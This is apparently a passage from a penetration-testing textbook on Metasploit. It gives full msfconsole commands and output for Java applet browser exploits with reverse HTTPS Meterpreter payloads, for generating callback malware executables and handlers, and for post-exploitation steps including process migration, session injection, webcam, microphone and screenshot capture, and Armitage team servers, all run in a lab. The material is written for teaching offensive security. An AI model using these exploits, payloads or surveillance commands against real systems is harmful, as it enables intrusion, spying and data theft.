msf exploit(java_jre17_jaxws) > info
Name: Java Applet JAX-WS Remote Code Execution
Module: exploit/multi/browser/java_jre17_jaxws
Platform: Java, Windows
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2012-10-16
... Output Deleted ...
Available targets:
Id Name
-- ----
0 Generic (Java Payload)
1 Windows Universal
2 Linux x86
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must
be an address on the local machine or
0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate
(default is randomly generated)
URIPATH no The URI to use for this exploit
(default is random)
Payload information:
Space: 20480
Avoid: 0 characters
Description:
This module abuses the JAX-WS classes from a Java Applet to run
arbitrary Java code outside of the sandbox as exploited in the wild
in November of 2012. The vulnerability affects Java version 7u7 and
earlier.
... Output Deleted ...
There are three choices for the target, including a Windows target and a Linux target. The default Java target has the advantage that it is independent of the target architecture and would work even if a Windows system running an exploitable Java version connected.
Configuring the Payload
Fewer payloads are available that use the Java target.
msf exploit(java_jre17_jaxws) > show payloads
Compatible Payloads
===================
Name Rank Description
---- ---- -----------
generic/custom normal Custom Payload
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP
Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP
Inline
java/jsp_shell_bind_tcp normal Java JSP Command Shell, Bind TCP
Inline
java/jsp_shell_reverse_tcp normal Java JSP Command Shell, Reverse TCP
Inline
java/meterpreter/bind_tcp normal Java Meterpreter, Java Bind TCP
Stager
java/meterpreter/reverse_http normal Java Meterpreter, Java Reverse HTTP
Stager
java/meterpreter/reverse_https normal Java Meterpreter, Java Reverse
HTTPS Stager
java/meterpreter/reverse_tcp normal Java Meterpreter, Java Reverse TCP
Stager
java/shell/bind_tcp normal Command Shell, Java Bind TCP Stager
java/shell/reverse_tcp normal Command Shell, Java Reverse TCP
Stager
java/shell_reverse_tcp normal Java Command Shell, Reverse TCP
Inline
Select the Meterpreter payload that communicates through reverse HTTPS, set the listening port to 443 and the IP address of the listener to the address of the Kali system.
msf exploit(java_jre17_jaxws) > set payload java/meterpreter/reverse_https
payload => java/meterpreter/reverse_https
msf exploit(java_jre17_jaxws) > set lport 443
lport => 443
msf exploit(java_jre17_jaxws) > set lhost 10.0.2.2
SRVHOST 0.0.0.0 yes The local host to listen on. This must
be an address on the local machine or
0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate
(default is randomly generated)
URIPATH bob no The URI to use for this exploit
(default is random)
Payload options (java/meterpreter/reverse_https):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.2 yes The local listener hostname
LPORT 443 yes The local listener port
LURI no The HTTP Path
Exploit target:
Id Name
-- ----
0 Generic (Java Payload)
Launching the Exploit as a Background Job
With the options validated, start the exploit as a background job.
msf exploit(java_jre17_jaxws) > exploit -j
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://10.0.2.2:443
msf exploit(java_jre17_jaxws) >
[*] Using URL: http://0.0.0.0:8080/bob
[*] Local IP: http://10.0.2.2:8080/bob
[*] Server started..
Interacting with the Shell
From the Mint system, visit the malicious page, located in this example at http://10.0.2.2:8080/bob. Firefox on the Mint system shows nothing other than a blank page. On the Kali system, msfconsole reports that a session has been obtained. The attacker interacts with a Java Meterpreter session in essentially the same way as a native Meterpreter session.
The years 2012 and 2013 saw many attacks against Java; Oracle responded by dramatically tightening the security settings for Java. Beginning with Java 7 Update 10, Java applets not signed by a trusted Certificate Authority either would not run or would not run without explicit user approval. These defenses make this type of exploit more difficult but not impossible. Further, later browsers began detecting insecure versions of plugins and disabling them (Figure 2-1).
Figure 2-1
Firefox 38.0.5 on Windows 8.1 showing how vulnerable add-ons are detected
Configuring the Exploit and Payload
This example demonstrates the Java Applet ProviderSkeleton Insecure Invoke Method attack against a Windows 8 system running Internet Explorer 10 and Java 7 Update 21. Start the Windows system and the Kali system, run msfconsole, and configure the exploit.
msf > use exploit/multi/browser/java_jre17_provider_skeleton
msf exploit(java_jre17_provider_skeleton) > set uripath bob
uripath => bob
msf exploit(java_jre17_provider_skeleton) > set payload java/meterpreter/reverse_https
payload => java/meterpreter/reverse_https
msf exploit(java_jre17_provider_skeleton) > set lhost 10.0.2.2
lhost => 10.0.2.2
msf exploit(java_jre17_provider_skeleton) > set lport 443
[*] Started HTTPS reverse handler on https://10.0.2.2:443
[*] Using URL: http://0.0.0.0:8080/bob
[*] Local IP: http://10.0.2.2:8080/bob
[*] Server started.
Java Security Settings
If an Internet Explorer user on the Windows 8 system visits the page hosting the malicious code, they immediately receive a dialog box informing them that the current version of Java is insecure. Only by promising to update Java later is the user permitted to proceed. This, of course, assumes that the user first agreed to enable Java for Internet Explorer after it was installed (Figure 2-2).
Figure 2-2
Internet Explorer 10 notification that the user is using an out-of-date version of Java; taken from Windows 8
The malicious Java applet is then downloaded, but the browser will not run it; instead it informs the user that the application was blocked by security settings on the system. This dialog box does not even provide a bypass option. To proceed, the user must first visit the Java Control Panel, available from the Windows Control Panel, under the Programs group. The security level must be set to Medium, which allows unsigned applets to run (Figure 2-3).
Figure 2-3
The Java Control Panel on Windows 8
Once this change is made and the web page reloads, another security warning is provided to the user stating that they are using an insecure version of Java that is trying to run an unsigned applet (Figure 2-4).
Figure 2-4
Java Security Warning from Windows 8
Only after manually checking the accept box will the option to run the applet be given. Once the user presses run though, the malicious code is launched, and the attacker gains a shell on the target.
[*] 10.0.15.208 java_jre17_provider_skeleton - handling request for /bob
[*] 10.0.15.208 java_jre17_provider_skeleton - handling request for /bob/
[*] 10.0.15.208 java_jre17_provider_skeleton - handling request for /bob/UzZM.jar
[*] 10.0.15.208 java_jre17_provider_skeleton - handling request for /bob/UzZM.jar
[*] Meterpreter session 1 opened (10.0.2.2:443 -> 10.0.15.208:49190) at 2017-02-14 20:04:44 -0500
Malware
As attacks against browsers and active content have become more common, software writers have responded by improving their code and their designs. The difficulty in attacking later versions of Java 7 is representative. No attacks have been discussed that target Java 8 (released in March 2014) or the Microsoft Edge browser (included in Windows 10 and released in July 2015).
Faced with these defenses, an attacker can turn to another weak point in the system - the user. An attacker that can convince a user to run software can use this as their initial vector into the system. Metasploit can be used to generate simple malware that provides an attacker a shell.
Malware Attack: Windows Executable
As an example of the process, suppose the attacker’s target is a 64-bit Windows 10 system, say Windows 10-1607.
Configuring the Malware
To generate the malware, the attacker starts Metasploit, but instead of running the use command with an exploit, they instead run the use command with a payload. Since the target is a 64-bit Windows system, a natural payload is a 64-bit Meterpreter using reverse HTTPS for communication.
EXITFUNC process yes Exit technique (Accepted: '', seh,
thread, process, none)
LHOST yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP Path
The attacker then specifies the listening host and updates the listening port if desired.
msf payload(reverse_https) > set lhost 10.0.2.2
lhost => 10.0.2.2
Generating the Malware
To create the malware, the attacker uses the generate command. Running generate with the -h flag shows the available options.6
msf payload(reverse_https) > generate -h
Usage: generate [options]
Generates a payload.
OPTIONS:
-E Force encoding.
-b <opt> The list of characters to avoid: '\x00\xff'
-e <opt> The name of the encoder module to use.
-f <opt> The output file name (otherwise stdout)
-h Help banner.
-i <opt> the number of encoding iterations.
-k Keep the template executable functional
-o <opt> A comma separated list of options in VAR=VAL format.
-p <opt> The Platform for output.
-s <opt> NOP sled length.
-t <opt> The output format: bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,axis2,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,jar,jsp,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-cmd,psh-net,psh-reflection,vba,vba-exe,vba-psh,vbs,war
-x <opt> The executable template to use
An attacker that wants to generate malware for a Windows system specifies the platform as windows, the output format as exe, and selects a file name.
msf payload(reverse_https) > generate -p windows -t exe -f windows_https_8443.exe
[*] Writing 7168 bytes to windows_https_8443.exe...
Handlers
Before the malware can be used, the attacker needs to set up a handler. When run, the malware will call back to the specified host (10.0.2.2 in this example). If that system is not ready to receive the callback, in the best-case scenario the malware will fail to run.
To set up the handler, the attacker uses the module exploit/multi/handler, then configures it with the payload it is designed to handle.
msf payload(reverse_https) > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_https
EXITFUNC process yes Exit technique (Accepted: '', seh,
thread, process, none)
LHOST 10.0.2.2 yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP Path
Exploit target:
Id Name
-- ----
0 Wildcard Target
If the attacker wants to be able to use the handler to respond to multiple requests, the option ExitOnSession should be set to false.
msf exploit(handler) > set exitonsession false
exitonsession => false
Launching the Exploit as a Background Job
The attacker then runs this exploit as a background job.
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://10.0.2.2:8443
[*] Starting the payload handler...
msf exploit(handler) >
The to_handler Command
As an alternative to manually configuring a handler and launching it, an attacker can use the command to_handler. This creates a background handler for the currently configured payload and launches it as a background job. The option ExitOnSession is set to true by default.
Suppose that the target of the attack is not a Windows system, but instead a 32-bit Linux system. The process of generating the malware follows the same basic lines. First, the attacker selects an appropriate payload, say a 32-bit Meterpreter for Linux.
msf > use payload/linux/x86/meterpreter/reverse_tcp
The options need to be set; in this case the only needed option is the address of the listening host that will receive the callback.
To prepare the handler that will receive the callback, the attacker uses exploit/multi/handler choosing the same payload and the same options as the malware.
msf payload(reverse_tcp) > use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 10.0.2.2
lhost => 10.0.2.2
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse TCP handler on 10.0.2.2:4444
msf exploit(handler) >
The attacker could also use the to_handler command.
When the malware is run on a remote system, the attacker receives a shell.
[*] Sending stage (826840 bytes) to 10.0.3.43
[*] Meterpreter session 1 opened (10.0.2.2:4444 -> 10.0.3.43:52413) at 2017-08-20 17:51:40 -0400
Metasploit and Meterpreter Commands
Metasploit and Meterpreter both feature a full range of commands.
Metasploit
Metasploit is used to manage exploits and sessions.
Help
Although the msfconsole program is a purely command-line driven program, significant effort has been expended to make it easier to use. It uses full tab completion, so partially remembered exploit or option names can be found with a few presses of the tab key.
It provides a help system via the help command.
msf exploit(handler) > help
Core Commands
=============
Command Description
------- -----------
? Help menu
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
exit Exit the console
... Output Deleted ...
Detailed help on any command is available by prepending help to the name of the command.
msf exploit(handler) > help exploit
Usage: exploit [options]
Launches an exploitation attempt.
OPTIONS:
-e <opt> The payload encoder to use. If none is specified, ENCODER is
used.
-f Force the exploit to run regardless of the value of
MinimumRank.
-h Help banner.
-j Run in the context of a job.
-n <opt> The NOP generator to use. If none is specified, NOP is used.
-o <opt> A comma separated list of options in VAR=VAL format.
-p <opt> The payload to use. If none is specified, PAYLOAD is used.
-t <opt> The target index to use. If none is specified, TARGET is used.
-z Do not interact with the session after successful exploitation.
Managing Sessions
Metasploit can handle multiple attacks and run multiple sessions at the same time. For example, suppose that the attacker from the previous section who has successfully exploited a Windows 10 system also configures the Java Applet ProviderSkeleton Insecure Invoke Method, and a Windows 8 host visits the page hosting the attack; then the attacker will obtain a session on the second system.
msf exploit(java_jre17_provider_skeleton) >
[*] Using URL: http://0.0.0.0:8080/bob
[*] Local IP: http://10.0.2.2:8080/bob
[*] Server started.
[*] 10.0.15.208 java_jre17_provider_skeleton - handling request for /bob/
[*] 10.0.15.208 java_jre17_provider_skeleton - handling request for /bob/PQTDaP.jar
[*] 10.0.15.208 java_jre17_provider_skeleton - handling request for /bob/PQTDaP.jar
A job can be terminated with the -k switch; this frees up any resources (e.g., URI, listening ports) from that job. If the -K switch is used, all current jobs are terminated.
Commands
Commands that are not interpreted by msfconsole directly are passed to the underlying shell for execution. For example, the command ifconfig provides its results directly from the Kali system on which msfconsole is running.
Many of the attacks discussed so far use Meterpreter as the preferred payload; this is because of its rich internal command set.
Networking
For example, once a Meterpreter session is established on a remote target, the ipconfig command and the route command provide information on the status of the target’s various network.
There are additional options available to an attacker running Meterpreter running natively on a Windows system. The time the system has been idle can be found with the command idletime, while screenshot returns an image of the target’s screen. The command webcam_list provides a list of the available web cameras on the system, and if any are available they can be used to take pictures with webcam_snap. If a microphone is present on the target, it can be used to make audio recordings with record_mic.
To obtain help on these, or any other Meterpreter command, run the command with the -h switch. Some, but not necessarily all, of these features are available on other versions of Meterpreter, like the Java Meterpreter or the native Linux Meterpreter.
File System
Meterpreter can be used to interact with the file system. The pwd command shows the current directory on the target, while ls lists the files in that directory.
meterpreter > pwd
C:\Users\jhaydn\Desktop
meterpreter > ls
Listing: C:\Users\jhaydn\Desktop
================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2017-03-19 23:01:42 -0400 Tools
The cd command is used to change directories, while rm is used to delete files from the target. Meterpreter also provides the ability to search for a file on the target with search, while files can be uploaded and downloaded with upload and download.
Navigating the directory structure on the attacking system is done with analogous local commands; this is useful when uploading files to the target.
meterpreter > lpwd
/root
meterpreter > lcd Desktop
meterpreter > lpwd
/root/Desktop
Processes
To run a new process on the target, use the execute command
meterpreter > execute -h
Usage: execute -f file [options]
Executes a command on the remote machine.
OPTIONS:
-H Create the process hidden from view.
-a <opt> The arguments to pass to the command.
-c Channelized I/O (required for interaction).
-d <opt> The 'dummy' executable to launch when using -m.
-f <opt> The executable command to run.
-h Help menu.
-i Interact with the process after creating it.
-k Execute process on the meterpreters current desktop
-m Execute from memory.
-s <opt> Execute process in a given session as the session user
-t Execute process with currently impersonated thread token
The list of processes running on the remote target can be found with the command ps.
Native Windows Meterpreter does not usually run as its own process, but rather is injected in some other process; that PID can be found with getpid.
meterpreter > getpid
Current pid: 3788
Migrating Processes
On a Windows system running native Meterpreter, the command migrate can be used to change the hosting process, provided the attacker has sufficient privileges to do so.
meterpreter > migrate 448
[*] Migrating from 3788 to 448...
[-] Error running command migrate: Rex::RuntimeError Cannot migrate into this process (insufficient privileges)
A careful look at the response Metasploit provided when the MS13-055 CAnchorElement attack was launched (see the “Attack: MS13-055 CAnchorElement” section earlier in this chapter) shows the following
[!] Meterpreter scripts are deprecated. Try post/windows/manage/migrate.
[!] Example: run post/windows/manage/migrate OPTION=value [...]
Because this is an older Metasploit module, it still includes an InitialAutoRunScript; this is a script that is meant to run immediately after the shell starts. In this case, the desired script is 'migrate -f', but as is shown, these have been deprecated.
When this exploit was launched, it spawned a Meterpreter shell running within the Internet Explorer process. However, if Internet Explorer is killed, the corresponding Meterpreter shell will also be killed. (This same problem occurs for some Firefox, Adobe Flash Player, and Java exploits.) Moreover, a user that sees an unresponsive or crashed browser window is likely to restart the browser, thus killing the Meterpreter shell. One solution is to quickly migrate to a different process; this is the purpose of the now deprecated InitialAutoRunScript.
Another option besides the migrate command is the module post/windows/manage/migrate. To use the module, load it as if it were an exploit module.
msf exploit(java_jre17_provider_skeleton) > use post/windows/manage/migrate
msf post(migrate) > info
Name: Windows Manage Process Migration
Module: post/windows/manage/migrate
Platform: Windows
Arch:
Rank: Normal
... Output Deleted ...
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
KILL false no Kill original process for the session.
NAME no Name of process to migrate to.
PID no PID of process to migrate to.
SESSION yes The session to run this module on.
SPAWN true no Spawn process to migrate to. If name
for process not given notepad.exe is
used.
Description:
This module will migrate a Meterpreter session from one process to
another. A given process PID to migrate to or the module can spawn
one and migrate to that newly spawned process.
To run the module, select a session, and then launch the exploit.
msf post(migrate) > set session 1
session => 1
msf post(migrate) > exploit
[*] Running module against CORADINI
[*] Current server process: windows_https_8443.exe (3788)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3056
[+] Successfully migrated to process 3056
[*] Post module execution completed
A check of the sessions after the migration shows that the session remains; however, interacting with that session and running the ps command shows that Meterpreter is now in a different process.
If the process containing Meterpreter is killed, either deliberately by the defender or accidentally, the attacker loses access. One way an attacker can reduce this risk is to create additional sessions. This can be done with the module post/windows/manage/multi_meterpreter_inject.
msf post(migrate) > use post/windows/manage/multi_meterpreter_inject
msf post(multi_meterpreter_inject) > info
Name: Windows Manage Inject in Memory Multiple Payloads
Now the attacker has a second session on the compromised host Coradini. Note that the architecture of the new payload (64-bit) matched the architecture of the original session.
Target Architecture
There are different versions of Meterpreter for Windows; there is a 32-bit version that runs on 32-bit and 64-bit systems as well as a 64-bit version that runs only on 64-bit systems. Some exploits on 64-bit systems require a 64-bit Meterpreter. To change the Meterpreter version to match the architecture, an attacker can use the Metasploit module post/windows/manage/archmigrate.
Channels
The attacker can use the shell command to open a command prompt on the target.
meterpreter > shell
Process 5168 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Users\jhaydn\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 12AD-BB43
Directory of C:\Users\jhaydn\Desktop
04/23/2017 05:07 PM <DIR> .
04/23/2017 05:07 PM <DIR> ..
04/18/2017 05:14 PM 366,512 eric.exe
03/19/2017 08:01 PM <DIR> Tools
04/18/2017 08:09 PM 1,040,528 vs_Community.exe
04/23/2017 04:58 PM 7,168 windows_https_8443.exe
2 File(s) 1,407,040 bytes
3 Dir(s) 10,616,836,096 bytes free
C:\Users\Stefan Banach\Desktop>^Z
Background channel 1? [y/N] y
meterpreter >
This creates a channel within the Meterpreter session. To leave the channel and return to Meterpreter, press CTRL+Z. The various channels in a Meterpreter session are controlled by the channel command.
meterpreter > channel
Usage: channel [options]
Displays information about active channels.
OPTIONS:
-c <opt> Close the given channel.
-h Help menu.
-i <opt> Interact with the given channel.
-k <opt> Close the given channel.
-l List active channels.
-r <opt> Read from the given channel.
-w <opt> Write to the given channel.
meterpreter > channel -l
Id Class Type
-- ----- ----
1 3 stdapi_process
Executing Commands in Multiple Sessions
It is possible to execute commands on multiple hosts through the -C option to the sessions command. As an example, here are the results from running sysinfo on two different sessions with the same command.
msf post(migrate) > sessions -C sysinfo
[*] Running 'sysinfo' on meterpreter session 1 (10.0.15.203)
Computer : CORADINI
OS : Windows 10 (Build 14393).
Architecture : x64
System Language : en_US
Domain : PLUTO
Logged On Users : 4
Meterpreter : x64/windows
[*] Running 'sysinfo' on meterpreter session 2 (10.0.15.208)
Computer : harrington
OS : Windows 8 6.2 (x86)
Meterpreter : java/windows
Armitage
Armitage provides both a graphical user interface and a collaboration environment for Metasploit. Developed by Raphael Mudge, Armitage is the baby brother of the commercial product Cobalt Strike (http://www.advancedpentest.com/).
Start Armitage from the command line with the command armitage. It makes use of the Metasploit database, which needs to have been configured already (see the “Configuring the Metasploit Internal Database” section earlier in this chapter). When Armitage first starts, it asks the user how to connect; retain the defaults (Figure 2-5). During the start process, Armitage asks the user if it should start Metasploit’s RPC server; answer yes.
Figure 2-5
Connecting to Armitage
Once Armitage is running, Metasploit exploits can be selected from a menu. Double-click on an exploit to bring up a menu to set the options; once the options have been set, press the launch button to start the exploit.
Systems known to Armitage are listed in the graphical interface; if the operating system is known, then an appropriate icon will be displayed. Systems on which a session has been established will have icons that feature the lightning bolts of joy (Figure 2-6).
Figure 2-6
Armitage in use
Armitage can function as a team server, allowing multiple attackers from multiple systems to collaborate. When run without arguments, the teamserver program provides a description of how the tool works.
root@kali-2016-2-u:~# teamserver
[*] You must provide: <external IP address> <team password>
<external IP address> must be reachable by Armitage
clients on port 55553
<team password> is a shared password your team uses to
authenticate to the Armitage team server
Start the Armitage team server by specifying an external IP address and a team password.
[*] Generating X509 certificate and keystore (for SSL)
[*] Starting RPC daemon
[*] MSGRPC starting on 127.0.0.1:55554 (NO SSL):Msg...
[*] MSGRPC backgrounding at 2017-02-14 22:54:47 -0500...
[*] sleeping for 20s (to let msfrpcd initialize)
[*] Starting Armitage team server
[*] Use the following connection details to connect your clients:
Host: 10.0.2.2
Port: 55553
User: msf
Pass: password1!
[*] Fingerprint (check for this string when you connect):
b5d8ae87b90cbfca823d2148b90fe5edf34b42ee
[+] I'm ready to accept you or other clients for who they are
Each team member starts a local copy of Armitage and connects to the team server by providing the required credentials; be sure to use the external IP address.
Each team member can perform scans; information from any scan is shared with all members of the team. If any team member establishes a session on a target, then all members of the team can interact with the session by right-clicking on the image of the host in the graphical user interface.
Notes and References
If you want to learn more about the Morris worm itself, take a look at the 1989 technical report “A Tour of the Worm” from Donn Seeley at the University of Utah. It is available at http://content.lib.utah.edu/cdm/ref/collection/uspace/id/709.
In my experience, some Metasploit modules work better than others. On many occasions, I have tried an exploit against a target that meets the required conditions, only to have it fail. Sometimes I can find the reason (maybe the exploit does not work on a closed network), and sometimes I cannot. If this happens to you, do not despair. Double-check your requirements (yes, I have made this mistake all too often), and try it on other systems. It may be the case though that the exploit depends on the state of either Metasploit or the target that in a way that is not met. It happens.
If Windows Defender is enabled on the target, then some of the various exploits will fail.
The first example exploit, EternalBlue, is known to be volatile, and it has the potential to crash the target system.
If, as suggested, you are working in a virtual security laboratory, one possible explanation for a failed attack may be the features of the host and/or your virtualization solution. This is particularly notable for exploits of Internet Explorer. For example, I have successfully attacked these systems when they are running on a Windows 7 host using VMWare Workstation 11, but the same attacks failed when the guests were copied to a Windows 10 host running VMWare Workstation 12. Repeating the attacks on similar systems on an ESXi server are successful.
Other times there are settings in the exploit that need to be tweaked. For example, I have found that although the MS13-037 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow exploit does not require the Java ROP, it works much more reliably with it. Run the command show advanced to see the option and the command set rop JRE6 to make the change. Similarly, the exploit MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution against Windows 7 targets seems to function better when AllowPowershellPrompt is set to true. As yet another example, on my Windows 10 testing system with VirtualBox 5.0, the exploit Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory run against a Windows 8.1 system with Firefox 38.0.5 Adobe Flash Player 15.0.0.189 and the payload windows/meterpreter/reverse_https reliably fails, but if the payload is changed to windows/meterpreter/reverse_tcp, the exploit reliably succeeds. The resulting shell is also limited; attempts to run the shell command to obtain a Windows command prompt crash the session.
Metasploit ranks the effectiveness of the various modules as Excellent, Great, Good, Normal, Average, Low, or Manual. Modules ranked as normal are considered reliable, while good or great ranked modules include some sort of automatic targeting. Modules listed as excellent cannot crash the target service. Modules listed as average are unreliable or difficult, while low-ranked modules are worse. For a description of the module rankings, see https://github.com/rapid7/metasploit-framework/wiki/exploit-ranking.
Also keep in mind that Metasploit is under active development, and modules can and do change.
If Firefox dies and won’t restart properly, disable all add-ons, then restart Firefox; the add-ons can then be re-enabled. The Firefox XCS Code Execution exploit abuses the AddonManager for Firefox, and sometimes (especially on Linux systems) Firefox is unable to recover. In some cases, Firefox is even unable to proceed beyond the Mozilla Crash Reporter to allow you to disable the add-ons. The solution in this case is to start Firefox from the command line in safe mode:
pdirichlet@acrux ~ $ firefox -safe-mode
Disable add-ons, and restart Firefox. The add-ons can then be re-enabled.
Metasploit provides two types of reverse payloads - staged payloads and stageless payloads. As an example, the payload described in the text, windows/meterpreter/reverse_https is a staged payload. In this case, there are two stages to the payload delivery. In the first step, a small stager is sent; this takes control of the process and provides a way to download the second, larger, stage that contains most of the functionality. However, it is possible to essentially send the payload as a single stage; this can be done with the corresponding payload windows/meterpreter_reverse_https. The full details of the differences between staged and stageless payloads are well explained by OJ Reeves on the Rapid7 Community page at https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads.
There is much more to Armitage than the short introduction provided by the text. For more details, check out the Armitage manual, available at http://www.fastandeasyhacking.com/manual.
References
There are many good books in print that discuss offensive security. For books on Metasploit, try the following:
Metasploit: The Penetration Tester’s Guide, David Kennedy, Jim O’Gorman, Devon Kearns, and Mati Aharoni. No Starch Press, July 2011.
Mastering Metasploit, 2nd ed., Nipun Jaswal. Packt Publishing, September 2016.
For a broader introduction to penetration testing, try these:
Penetration Testing: A Hands-On Introduction to Hacking, Georgia Weidman. No Starch Press, June 2014.
The Basics of Hacking and Penetration Testing: Ethical Hacking and Penetration Testing Made Easy, 2nd ed., Patrick Engebretson. Syngress, August 2013.
Advanced Penetration Testing for Highly-Secured Environments: The Ultimate Security, Lee Allen. Packt Publishing, May 2012.
To learn more about Kali and some of the other tools Kali provides, try these:
